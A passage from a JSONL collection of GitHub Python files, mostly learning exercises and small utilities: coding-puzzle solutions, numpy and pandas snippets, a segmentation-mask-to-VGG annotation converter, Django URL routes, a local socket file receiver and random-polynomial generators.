\n return images\n \ndef getCSV(rootdir, index):\n\n for dirs in os.listdir(rootdir):\n \n if index == 0:\n \n csv = open(rootdir + '/' + dirs + '/mid.csv', 'rb')\n \n #print dirs\n \n index = index - 1\n \n return csv\n \nrootdir = '/Users/quero/Desktop/ML/SemesterProject/FIDs_NEW'\n\n\n#print csv\n#print data\n#print(images)\n","repo_name":"yuanyangxin/Kinship-Prediction","sub_path":"fileFinder.py","file_name":"fileFinder.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34665246069","text":"from resource_management.presenters.presenter_implementation import \\\n PresenterImplementation\nfrom resource_management.dtos.dtos import ItemDto\n\n\ndef test_get_item_details_response(item_dto):\n\n #Arrange\n\n expected_item_dict = {\n 'item_id': 1,\n 'title': 'item1',\n 'resource_name': 'github',\n 'description': 'item_description',\n 'link': 'https://item1'\n }\n\n presenter = PresenterImplementation()\n\n #Act\n actual_item_dict = presenter.get_item_details_response(\n item_dto=item_dto\n )\n\n #Assert\n assert actual_item_dict == expected_item_dict\n","repo_name":"Ganga-Prathap/resource_management","sub_path":"resource_management/tests/presenters/test_get_item_details_response.py","file_name":"test_get_item_details_response.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5086137806","text":"def solution(id_list, report, k):\n answer = []\n reported_dict = {id: {'reporter': set(), 'mail_cnt': 0} for id in id_list}\n\n for r in report:\n reporter, reported_person = r.split(' ')\n reported_dict[reported_person]['reporter'].add(reporter)\n\n for key, val in reported_dict.items():\n if len(val['reporter']) >= k:\n for reporter in reported_dict[key]['reporter']:\n reported_dict[reporter]['mail_cnt'] += 1\n\n for val in reported_dict.values():\n 
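# The presenter test above follows the Arrange-Act-Assert layout and relies on
# an item_dto fixture defined elsewhere in that repo. A self-contained sketch
# of the same pattern with a stand-in fixture; all names here are illustrative.
import pytest

@pytest.fixture
def sample_dto():
    return {'item_id': 1, 'title': 'item1'}

def test_presenter_shapes_response(sample_dto):
    # Arrange
    expected = {'item_id': 1, 'title': 'item1'}
    # Act
    actual = dict(sample_dto)
    # Assert
    assert actual == expected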
answer.append(val['mail_cnt'])\n return answer\n\n\nprint(\n solution([\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\", \"apeach frodo\", \"frodo neo\", \"muzi neo\", \"apeach muzi\"],\n 2))\n","repo_name":"deok2kim/algorithm","sub_path":"프로그래머스/2022 KAKAO BLIND RECRUITMENT/신고 결과 받기.py","file_name":"신고 결과 받기.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29522111329","text":"def run():\r\n '''\r\n Reto 25: Utiliza la lista de compras del reto anterior para\r\n construir una cadena con saltos de línea sin usar ciclos\r\n '''\r\n shop_list = ['noodles', 'garlic', 'chili', 'tomatoes', 'butter', 'ginger', 'flour']\r\n txt_sep = '\\n'.join(shop_list)\r\n \r\n print(txt_sep) \r\n \r\nif __name__ == '__main__':\r\n run()","repo_name":"HaroldRoy/100-Days-of-Python","sub_path":"25_join.py","file_name":"25_join.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15653057679","text":"import os\nimport json\nimport argparse\nimport cv2\nimport imagesize\nfrom tqdm import tqdm\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"--data-path\",\n help=\"path to a folder containing the images\",\n default=\"data/test1\",\n)\nparser.add_argument(\n \"--images-path\",\n help=\"path to a folder containing the images\",\n default=\"segmentation_images\",\n)\nparser.add_argument(\n \"--masks-path\",\n help=\"path to the annotations\",\n default=\"segmentation_masks\",\n)\n\nargs = parser.parse_args()\nargs.images_path = os.path.normpath(args.images_path)\nargs.masks_path = os.path.normpath(args.masks_path)\n\n\ndef generate_vgg_annotation(image_path, segmentation_mask_path):\n segmentation_mask = cv2.imread(segmentation_mask_path)\n segmentation_mask = cv2.resize(segmentation_mask, imagesize.get(image_path))\n\n # Read the binary mask, and find the contours associated\n table, players, scoreboard = seperate_channels(segmentation_mask)\n\n table = cv2.cvtColor(table, cv2.COLOR_BGR2GRAY)\n players = cv2.cvtColor(players, cv2.COLOR_BGR2GRAY)\n scoreboard = cv2.cvtColor(scoreboard, cv2.COLOR_BGR2GRAY)\n\n _, table = cv2.threshold(table, 1, 255, 0)\n _, players = cv2.threshold(players, 1, 255, 0)\n _, scoreboard = cv2.threshold(scoreboard, 1, 255, 0)\n\n table_contours, _ = cv2.findContours(table, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n players_contours, _ = cv2.findContours(\n players, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE\n )\n scoreboard_contours, _ = cv2.findContours(\n scoreboard, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE\n )\n\n # -------------------------------------------------------------------------------\n # BUILDING VGG ANNTOTATION TOOL ANNOTATIONS LIKE\n if table_contours or players_contours or scoreboard_contours:\n table_regions = [0] * len(table_contours)\n for i in range(len(table_contours)):\n table_regions[i] = {\n \"shape_attributes\": {\n \"name\": \"polygon\",\n \"all_points_x\": table_contours[i][:, 0][:, 0].tolist(),\n \"all_points_y\": table_contours[i][:, 0][:, 1].tolist(),\n },\n \"region_attributes\": {\"class\": \"table\"},\n }\n\n players_regions = [0] * len(players_contours)\n for i in range(len(players_contours)):\n players_regions[i] = {\n \"shape_attributes\": {\n \"name\": \"polygon\",\n \"all_points_x\": players_contours[i][:, 0][:, 0].tolist(),\n \"all_points_y\": players_contours[i][:, 0][:, 1].tolist(),\n },\n \"region_attributes\": {\"class\": 
\"players\"}\n }\n\n scoreboard_regions = [0] * len(scoreboard_contours)\n for i in range(len(scoreboard_contours)):\n scoreboard_regions[i] = {\n \"shape_attributes\": {\n \"name\": \"polygon\",\n \"all_points_x\": scoreboard_contours[i][:, 0][:, 0].tolist(),\n \"all_points_y\": scoreboard_contours[i][:, 0][:, 1].tolist(),\n },\n \"region_attributes\": {\"class\": \"scoreboard\"},\n }\n\n regions = dict(enumerate(table_regions + players_regions + scoreboard_regions))\n\n size = os.path.getsize(image_path)\n name = os.path.basename(image_path) + str(size)\n json_elt = {\"filename\": os.path.basename(image_path)}\n json_elt[\"size\"] = str(size)\n json_elt[\"regions\"] = regions\n json_elt[\"file_attributes\"] = {}\n return {name: json_elt}\n\n\ndef seperate_channels(image):\n b = image.copy()\n # set green and red channels to 0\n b[:, :, 1] = 0\n b[:, :, 2] = 0\n\n g = image.copy()\n # set blue and red channels to 0\n g[:, :, 0] = 0\n g[:, :, 2] = 0\n\n r = image.copy()\n # set blue and green channels to 0\n r[:, :, 0] = 0\n r[:, :, 1] = 0\n\n return r, g, b\n\n\nnum = os.path.basename(args.data_path)[-1]\nsuffix = \"\" if num == \"1\" else f\"_{num}\"\nfinal_dict = {}\nfor image in tqdm(os.listdir(os.path.join(args.data_path, args.masks_path))):\n final_dict |= generate_vgg_annotation(\n os.path.join(\n args.data_path, args.images_path, image.strip(\".png\") + f\"{suffix}.png\"\n ),\n os.path.join(args.data_path, args.masks_path, image),\n )\n\n\nwith open(os.path.join(args.data_path, \"via_region_data.json\"), \"w\") as json_file:\n json.dump(final_dict, json_file)\n","repo_name":"kethan1/table-tennis-game-annotator","sub_path":"data_processing/convert_to_vgg_annotation_format.py","file_name":"convert_to_vgg_annotation_format.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"11350504962","text":"#!/usr/bin/python3\n\n\"\"\"\nGiven an n x n array, return the array elements arranged from outermost elements to the middle element, traveling clockwise.\n\narray = [[1,2,3],\n [4,5,6],\n [7,8,9]]\nsnail(array) #=> [1,2,3,6,9,8,7,4,5]\nFor better understanding, please follow the numbers of the next array consecutively:\n\narray = [[1,2,3],\n [8,9,4],\n [7,6,5]]\nsnail(array) #=> [1,2,3,4,5,6,7,8,9]\nThis image will illustrate things more clearly:\n\n\nNOTE: The idea is not sort the elements from the lowest value to the highest;\nthe idea is to traverse the 2-d array in a clockwise snailshell pattern.\n\nNOTE 2: The 0x0 (empty matrix) is represented as en empty array inside an array [[]].\n\n\"\"\"\n\nimport unittest\n\nE, S, W, N = (1, 0), (0, 1), (-1, 0), (0, -1)\nturn_right = { E:S, S:W, W:N, N:E}\n\ndef snail(snail_map):\n result = []\n visited = []\n size = len(snail_map[0])\n x = 0\n y = 0\n direction = E\n\n if snail_map == [[]]:\n return []\n\n result.append(snail_map[0][0])\n visited.append((0,0))\n while True:\n if len(visited) == size**2:\n return result\n\n dx, dy = direction\n new_x, new_y = x + dx, y + dy\n if (0 <= new_x <= size-1 and 0 <= new_y <= size-1 and (new_y, new_x) not in visited):\n x, y = new_x, new_y\n visited.append((y, x))\n result.append(snail_map[y][x])\n\n else:\n direction = turn_right[direction]\n\n\nclass TestSnailList(unittest.TestCase):\n def test_list_equality(self):\n array = [[1,2,3],\n [4,5,6],\n [7,8,9]]\n expected = [1,2,3,6,9,8,7,4,5]\n self.assertListEqual(snail(array), expected)\n\n def test_list_equality2(self):\n array = [[1,2,3],\n [8,9,4],\n 
[7,6,5]]\n expected = [1,2,3,4,5,6,7,8,9]\n self.assertListEqual(snail(array), expected)\n\n\nif __name__==\"__main__\":\n unittest.main()\n","repo_name":"mikalai-dev/codewars","sub_path":"snail_list.py","file_name":"snail_list.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"247771992","text":"#!C:/Users/xiaox/Anaconda3 python\n# -*- coding: utf-8 -*-\n' what? '\n__author__ = 'xiaox'\n\nfrom functools import reduce\n\ndef str2num(s):\n try:\n return int(s)\n except Exception as e:\n print(\"restock exception, making a modification\")\n return float(s)\n\ndef calc(exp):\n ss = exp.split('+')\n ns = map(str2num, ss)\n return reduce(lambda acc, x: acc + x, ns)\n\ndef main():\n r = calc('100 + 200 + 345')\n print('100 + 200 + 345 =', r)\n r = calc('99 + 88 + 7.6')\n print('99 + 88 + 7.6 =', r)\n\nmain()\n\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\ns = '0'\nn = int(s)\nlogging.info('n = %d' % n)\nprint(10 / n)\n\n","repo_name":"hzqfxx/python","sub_path":"project/mydemo/oop/ErrorTest.py","file_name":"ErrorTest.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27328701554","text":"from game.actions.action import Action\nfrom game.services.point import Point\nfrom game import constants\n\nclass Handle_Off_Screen_Action(Action):\n \"\"\"\n This class receives the cast and handles all actions \n related to actors on the edge of the screen\n \"\"\"\n\n def execute(self, cast):\n \"\"\"\n Handles all off screen actions of the game.\n \"\"\"\n\n ###This will be used in a later version of the game to let bullets bounce on the edge\n # for group in cast.values():\n # for actor in group:\n # if actor.get_bounce_on_edge():\n # if actor.get_position_y() < 0:\n # dx = actor.get_velocity_x()\n # dy = (actor.get_velocity_y()) * -1\n # actor.set_velocity(Point(dx,dy))\n # if actor.get_position_x() + actor.get_width() > constants.MAX_X or actor.get_position_x() < 0:\n # dx = (actor.get_velocity_x()) * -1\n # dy = actor.get_velocity_y()\n # actor.set_velocity(Point(dx,dy))\n\n #Removes the Bullets that have gone off the side of the screen\n for group in cast.values():\n for actor in group:\n if (actor.get_position_x() < -100 or\n actor.get_position_x() > constants.MAX_X + 100 or\n actor.get_position_y() < -100 or\n actor.get_position_y() > constants.MAX_Y + 100):\n \n cast[\"bullets\"].remove(actor)\n","repo_name":"DallinatorX/vs-bullet-heck","sub_path":"bullet-heck/game/actions/handle_off_screen_action.py","file_name":"handle_off_screen_action.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1799361310","text":"from django.urls import path\nfrom .views import (\n ContactsView,\n\n ProductDetailView,\n ProductListView,\n ProductCreateView,\n ProductUpdateView,\n CategoriesListView,\n CategoryDetailView,\n\n BlogCreateView,\n BlogListView,\n BlogDetailView,\n BlogUpdateView,\n BlogDeleteView,\n)\n\nfrom django.views.decorators.cache import cache_page\n\napp_name = 'catalog'\n\nurlpatterns = [\n path('', ProductListView.as_view(), name='inc_base'),\n\n path('contacts/', ContactsView.as_view(), name='contacts'),\n\n path('product//', cache_page(60)(ProductDetailView.as_view()), name='product_view'),\n path('product/create/', ProductCreateView.as_view(), name='product_create'),\n path('product//update/', 
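# An alternative to the visited-set walk in snail() above: peel off the top row
# and rotate the remainder counter-clockwise until nothing is left. Offered as
# a hedged sketch with equivalent output, not a replacement for the tested code.
def snail_rotate(matrix):
    out = []
    rows = [list(r) for r in matrix if r]  # copy input; treats [[]] as empty
    while rows:
        out += rows.pop(0)
        rows = [list(r) for r in zip(*rows)][::-1]  # rotate counter-clockwise
    return out

print(snail_rotate([[1, 2, 3], [4, 5, 6], [7, 8, 9]]))  # [1, 2, 3, 6, 9, 8, 7, 4, 5]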
ProductUpdateView.as_view(), name='product_update'),\n\n path('categories/', CategoriesListView.as_view(), name='categories'),\n path('categories/view/', CategoryDetailView.as_view(), name='view_category'),\n\n path('blog/', BlogListView.as_view(), name='entry_list'),\n path('blog/create/', BlogCreateView.as_view(), name='entry_form'),\n path('blog//', BlogDetailView.as_view(), name='entry_detail'),\n path('blog//update/', BlogUpdateView.as_view(), name='entry_update'),\n path('blog//delete/', BlogDeleteView.as_view(), name='entry_delete'),\n]\n","repo_name":"electr0n4ik/catalog_django","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20582875490","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[18]:\n\n\n# Write a function that prints the “*” character on every line, up to a number n entered from the keyboard\nn = int(input())\nfor i in range(1, n + 1):\n k = \"*\" * i\n print(k)\n\n\n# In[19]:\n\n\n# Write a function that prints the “*” character on every line of a list, up to a number n entered from the keyboard.\ndef pypart(n):\n mylist =[]\n for i in range(1, 1+n):\n mylist.append(\"*\"*i)\n print(\"\\n\".join(mylist))\n n = int(input())\npypart(n)\n\n\n# In[20]:\n\n\n# Write a function that gets the keys with the largest and smallest values from the following dictionary.\na_dictionary = {'Bat': 18, 'Oyun': 22, 'Dulam': 21, 'Suren': 20}\nmax_key = max(a_dictionary, key=a_dictionary.get)\nmin_key = min(a_dictionary, key=a_dictionary.get)\na = (max_key, min_key)\nprint(a)\n\n\n# In[22]:\n\n\n# Create an np.arange(1-1000) array. From that array, find the sum of the numbers divisible by 3 or 7.\nimport numpy as np\nx = np.arange(1, 1000)\nn = x[(x % 3 == 0) | (x % 7 == 0)]\nprint(n)\nprint(n.sum())\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Sodmunkh/DBP221","sub_path":"Seminar №5, DBP221 (421), B20FA1514 .py","file_name":"Seminar №5, DBP221 (421), B20FA1514 .py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"mn","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22950161495","text":"import pandas\n\ndata = pandas.read_csv(\"../../datasets/customer-churn-model/Customer Churn Model.txt\")\n# print(data.head())\n\n# Selection of a specific set of data by selecting one column\n\naccount_length = data[\"Account Length\"]\n# print(account_length.head())\n\n# Creation of a subset from several columns\nsubset = data[[\"Account Length\", \"Phone\", \"Eve Charge\", \"Day Calls\"]]\n# print(subset.head())\n\ndesired_columns = [\"Account Length\", \"Phone\", \"Eve Charge\", \"Day Calls\"]\nsubset = data[desired_columns]\n# print(subset.head())\n\n# Simple list comprehension for creating a subset based on the list of desired items\ndesired_columns = [\"Account Length\", \"VMail Message\", \"Day Calls\"]\nall_columns_list = data.columns.values.tolist()\n\nprint(all_columns_list)\nsublist = [column for column in all_columns_list if column in desired_columns]\n\nprint(sublist)\n","repo_name":"jlaitue/Python-ML","sub_path":"data_wrangling/subset_data_columns.py","file_name":"subset_data_columns.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30479019734","text":"#coding = utf-8\r\n'''\r\nThis program is used to receive sample files\r\n'''\r\nfrom send import *\r\nimport os\r\n\r\nstrans = sTrans()\r\n\r\nip = '127.0.0.1'\r\nport = 2000\r\ns = strans.build_socket(ip,port)\r\ns.listen(500)\r\nrecvPath = '/home/g6/tmp/' 
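# The receiver above delegates to sTrans from this repo's own send module, so
# its API (build_socket, recving, close_socket) is assumed. A self-contained
# sketch of the underlying accept-and-receive loop using only the standard
# library; the host, port and behavior here are illustrative.
import socket

def serve_once(host='127.0.0.1', port=2000):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    conn, addr = srv.accept()          # block until one client connects
    with conn:
        chunks = []
        while True:
            data = conn.recv(4096)     # read until the client closes
            if not data:
                break
            chunks.append(data)
    srv.close()
    return b''.join(chunks)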
#接收到的文件可以自定义存放位置\r\n\r\nwhile 1:\r\n conn,addr = s.accept()\r\n strans.recving(conn,recvPath)\r\n strans.close_socket(conn)\r\n\r\n","repo_name":"weiyuchen/Tools","sub_path":"auto_asyn/sampleBase.py","file_name":"sampleBase.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3338345275","text":"# 34 -----------------сдал как 33\n# Задана натуральная степень k. Сформировать случайным образом список коэффициентов \n# (значения от 0 до 100) многочлена и записать в файл многочлен степени k. \n# *Пример: \n# k=2 => 2*x² + 4*x + 5 = 0 или x² + 5 = 0 или 10*x² = 0\n\n\n \n'''degree^ - дуга^ - степень^\n reduce - редкий - уменьшение'''\nimport random\n \ndef get_polynom(degree):\n polynom_str = '' # создаем стринговую пустую строку\n for i in range(degree, -1, -1): # мы используем диапазон целых чисел от degree рандомного числа и до -1 с шагом -1\n # -1 шаг значит в обратную сторону; -1 ВТОРОЕ ЧИСЛО это мы захватываем и 0, где будет наше число без икса х\n a = random.randint(0, 100) # получаем некое рандомное число random.randint(0, 100)\n print(i,degree) # 0 10\n if a != 0: # если a != 0 это условие при котром значение а цифра перед х не будлет равно 0\n if i == degree and i != 1: # это охначает обращение к первому числу слева !!!!!!!!!!!!!!!!\n polynom_str += str(a) + '*x^' + str(i) # это первое число в уравнении слева\n # elif i == degree and i == 1: # это обращение ко всем числам, оно лищнее\n # polynom_str += str(a) + 'x'\n elif i == 1: # это обращение конкретно к элементу 2 или индексу элемента 1 в строке от нуля\n polynom_str += ' + ' + str(a) + '*x' # переделывыаем в этом элементе 'x^' на 'x'\n elif i == 0: # это обращение конкретно к элементу 1 или индексу элемента 0 в строке от нуля\n polynom_str += ' + ' + str(a) # тут мы оставляем число \n # по сути выше у нас рабираются три элемента последний, первый и второй\n else: # и else говорит, что теперь всем остальным элементам кроме трех что выше присваиваем следующее\n polynom_str += ' + ' + str(a) + '*x^' + str(i) # + цифра + х + степень\n return polynom_str + ' = 0' # сдесь написано -- возвращаем все уроавнение и приписываем = 0\n\ndegree = random.randint(3,10)\nresult = get_polynom(degree)\nprint(f'Многочлен степени {degree}: {result}') # 64x^6 + 16x^5 + 87x^4 + 64x^3 + 51x^2 + 8x + 87 = 0\n\n\n'''2 вариант '''\nimport random\nfrom functools import reduce\nimport re\n\n''' Функция sub() модуля re возвращает строку, полученную путем замены крайнего левого \nнеперекрывающегося вхождения шаблона регулярного выражения pattern в строке string на строку замены repl. 
\nЕсли шаблон регулярного выражения не найден, строка возвращается без изменений.'''\n\ndef normalize_polynom(polynom_str): # общепринятые сокращения\n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x^1 + 14x^0 + \n polynom_str = re.sub(r'\\b0x\\^\\d+ \\+ ', r'', polynom_str) # 0x^k' -> '' убирает такой символ, потому что 0\n polynom_str = re.sub(r'\\b1x\\^(\\d+)', r'x\\^\\1', polynom_str) # 1x^k' -> 'x^k' убирает 1 если встречается в цифре\n # polynom_str = re.sub(r'(\\d+)x\\^1', r'\\1x', polynom_str) # nx^1' -> 'nx' удаляем 1 в степени\n polynom_str = re.sub(r'(\\d+)x\\^0', r'\\1', polynom_str) # nx^0' -> 'n' последнее число справа индекс 0 \n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 + \n return polynom_str\n\ndef get_polynom_x(k):\n polynom_list = [str(random.randint(0, 100)) + 'x^' + str(n) + ' + ' for n in range(k, -1, -1)]\n # n будет каждый раз уменьшаться на -1 и идти назад -1 получаем некое рандомное число random.randint(0, 100)\n # канкетенироуем его с 'x^' и канкетинируем его со строковым представлением нашего числа полученного str(n) степень\n # и прибавляем + ' + '\n # мы берем диапазон числа к до -1 с шагом -1 # получим обратный счет 6 5 4 3 2 1 0\n # polynom_str = reduce(lambda x, y: x + y, polynom_list) # объединяется весь список уравнения через reduce\n polynom_str = ''.join(polynom_list) # строки можно соединять проще через join если не нужно посчитать интовое значение\n polynom_str = normalize_polynom(polynom_str)\n return polynom_str[: -3] + ' = 0' # это означает отступить с конца 3 символа удалив содержимое и заполнив его ' = 0'\n'''функция reduce получает последовательность polynom_list и она складывает всю последовательность'''\n'''reduce(lambda x, y: x + y, polynom_list) объединяется весь список'''\n''' ПРИМЕР\n # polynom_list = '1', '2', '3', '4', '5'\n # polynom_str = reduce(lambda x, y: x + y, polynom_list)\n # print(polynom_str) # 12345\n чтобы получить сумму элементов нужно перевести в интовое значение\n polynom_str = reduce(lambda x, y: int(x) + int(y), polynom_list) # в этом случае print выдаст результат = 15\n # print(polynom_str) # 15'''\n\n# тест\nimport os\nk = random.randint(1, 10)\npolynom = get_polynom_x(k)\nprint(f'Полином степени {k}: {polynom}') # Полином степени 5: 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 = 0\n\nwith open('ex_48_out.txt', 'w') as data:\n data.write(polynom)\n\n\n'''3 вариант изменённый'''\nimport random\nfrom functools import reduce\nimport re\n'''ОНО УЖЕ НЕ НУЖНО!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'''\ndef normalize_polynom(polynom_str): # общепринятые сокращения\n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x^1 + 14x^0 + \n polynom_str = re.sub(r'\\b0x\\^\\d+ \\+ ', r'', polynom_str) # 0x^k' -> '' убирает такой символ, потому что 0\n polynom_str = re.sub(r'\\b1x\\^(\\d+)', r'x\\^\\1', polynom_str) # 1x^k' -> 'x^k' убирает 1 если встречается в цифре\n # polynom_str = re.sub(r'(\\d+)x\\^1', r'\\1x', polynom_str) # nx^1' -> 'nx' удаляем 1 в степени\n polynom_str = re.sub(r'(\\d+)x\\^0', r'\\1', polynom_str) # nx^0' -> 'n' последнее число справа индекс 0 \n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 + \n return polynom_str\n'''!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'''\ndef get_polynom_x(k):\n polynom_list = ''\n # polynom_list = [str(random.randint(0, 100)) + 'x^' + str(n) + ' + ' for n in range(k, -1, -1)]\n\n '''Несколько if означает, 
что ваш код будет идти и проверять все условия if, \n где, как и в случае elif, если одно условие if удовлетворяет, оно не будет проверять другие условия..'''\n \n for n in range(k, -1, -1):\n a = str(random.randint(0, 100)) \n if n == 1: \n polynom_list += str(a) + 'x'+ ' + '\n elif n == 0: \n polynom_list += str(a)\n else:\n polynom_list += str(a) + 'x^' + str(n) + ' + ' \n polynom_str = ''.join(polynom_list) # строки можно соединять проще через join если не нужно посчитать интовое значение\n polynom_str = normalize_polynom(polynom_str)\n return polynom_str + ' = 0' # ъто означает отступить с конца 3 символа удалив содержимое и заполнив его ' = 0'\n\n# тест\nimport os\nk = random.randint(10, 10)\npolynom = get_polynom_x(k)\nprint(f'Полином степени {k}: {polynom}') # Полином степени 5: 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 = 0\n\n\n\n'''4 вариант '''\nfrom random import randint\nimport itertools\n\nk = randint(3, 10) # рандом степень\n\ndef get_ratios(k):\n ratios = [randint(0, 100) for i in range (k + 1)] # берет коэффициент и +1 следующий из начального числа рандома\n # b так заполняют список ratios\n while ratios[0] == 0: # пока нулевой коэффициент = 0\n ratios[0] = randint(1, 10) # рандомные числа присваиваются к нулевому коэффициенту\n return ratios\nprint(get_ratios(k)) # только смотреть надо ниже в принтах конечных, будет другой рандом а не этот [9, 9, 4, 8]\n\ndef get_polynomial(k, ratios): # в функции задействовано степень х и прошлые полученные числа\n var = ['*x^']*(k-1) + ['*x'] # это не метод а просто кто то так назвал var !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n print(var) # ['*x^', '*x^', '*x']\n polynomial = [[a, b, c] for a, b, c in itertools.zip_longest(ratios, var, range(k, 1, -1), fillvalue = '') if a !=0]\n # беется 3 аргумента нужные нам для каждого элемента уравнения , запускается цикл в itertools.zip_longest\n # b сопоставляют цифры - ratios, иксы с знаком умножения - var, обэединяют в картэж с последовательностью \n # от рандом степени к до 1 с шагом -1, значит обратный варинат от большего к меньшему, все лишнее выкидывается\n # а пропущенные элементы заполняются значением fillvalue.'''при этом выполняется условие если a !=0\n '''Функция zip_longest() модуля itertools создает итератор, который объединяет элементы из каждой \n итерируемой последовательности *iterables в кортежи.\n\n Отличие функции itertools.zip_longest() от встроенной функции zip() заключается в том, что zip() \n останавливается по исчерпании самой короткой входной последовательности и отбрасывает несопоставимые \n значения более длинных итераций, в то время как itertools.zip_longest() работает пока самая длинная \n итерация не будет исчерпана, а пропущенные элементы заполняются значением fillvalue.'''\n print(polynomial) # [[5, '*x^', 3], [10, '*x^', 2], [9, '*x', ''], [5, '', '']]\n for x in polynomial:\n x.append(' + ') # берем каждый элемент x списка polynomial и присваиваем между ними (' + ')\n polynomial = list(itertools.chain(*polynomial)) # составление нового большого списка через list\n print(polynomial) # [5, '*x^', 3, ' + ', 10, '*x^', 2, ' + ', 9, '*x', '', ' + ', 5, '', '', ' + ']\n polynomial[-1] = ' = 0' # присваиваем polynomial на месте последнего элемента [-1] концовку уравнения ' = 0'\n print(polynomial) # [5, '*x^', 3, ' + ', 10, '*x^', 2, ' + ', 9, '*x', '', ' + ', 5, '', '', ' = 0']\n return \"\".join(map(str, polynomial)).replace(' 1*x',' x') # составляет стринговый вариант записи jpin\n # с помощью мар создаем новую коллекцию стринговых элементов из polynomial. 
заменяем на ходу если есть(' 1*x',' x')\n\n'''map() — это встроенная функция, которая позволяет обрабатывать и преобразовывать все элементы \nв итерируемом объекте без использования явного цикла for, методом, широко известным как сопоставление (mapping). \nmap() полезен, когда вам нужно применить функцию преобразования к каждому элементу в коллекции \nили в массиве и преобразовать их в новый массив.'''\n\nratios = get_ratios(k)\nprint(ratios) # [5, 10, 9, 5]\npolynom1 = get_polynomial(k, ratios)\nprint(polynom1) # 9*x^3 + 10*x^2 + 9*x + 7 = 0\n\nwith open('33_Polynomial.txt', 'w') as data: # ну а тут открываем файл и принудительно записываем в него\n data.write(polynom1)\n\n\n","repo_name":"Kassey69/Python_seminars_old","sub_path":"Seminar5/Task48_DZ.py","file_name":"Task48_DZ.py","file_ext":"py","file_size_in_byte":14220,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70584660993","text":"# -*- coding:utf-8 -*-\n# @FileName :core.py\n# @Author :Deyu He\n# @Time :2022/7/11 12:39\n\nimport json\nimport os\nimport shutil\nimport xml.etree.ElementTree as ET\nfrom pathlib import Path\nfrom typing import Iterator, List, Union\n\nimport yaml\nfrom loguru import logger\n\n__all__ = [\n \"mkdir\",\n \"append_file_name\",\n \"replace_parent\",\n \"copy_related_files\",\n \"glob_dir\",\n \"load_xml\",\n \"dump_xml\",\n \"load_yaml\",\n \"dump_yaml\",\n \"load_json\",\n \"dump_json\",\n]\n\n\ndef mkdir(path, parents=True, exist_ok=True):\n Path(str(path)).mkdir(parents=parents, exist_ok=exist_ok)\n\n\ndef append_file_name(path_, append_str):\n path_ = Path(path_)\n return str(path_.parent / Path(path_.stem + append_str).with_suffix(path_.suffix))\n\n\ndef replace_parent(path_, target_prarent):\n path_ = Path(path_)\n return str(Path(target_prarent) / path_.name)\n\n\ndef glob_dir(\n dir_,\n include_patterns: Union[List[str], None] = None,\n exclude_patterns: Union[List[str], None] = None,\n ignore_case=False,\n) -> Iterator[Path]:\n \"\"\"Glob directory recursively and filter paths by extensions and filename suffix\n\n Args:\n dir_: directory path\n include_patterns: list of include patterns, eg [\"*.png\", \"*.txt\"]\n exclude_patterns: list of exclude patterns, eg: [\"*mask.png\", \"*mask.txt\"]\n ignore_case: case sensitive match or not\n\n Returns:\n Iterator[Path]: an iterator of matched paths under given directory\n\n Raises:\n FileNotFoundError: If given directory dose not exist\n\n Examples:\n # glob current directory, get .py files without *version.py like files\n >>> glob_dir(\".\", include_patterns=[\"*.py\"], exclude_patterns=[\"*version.py\"])\n \"\"\"\n 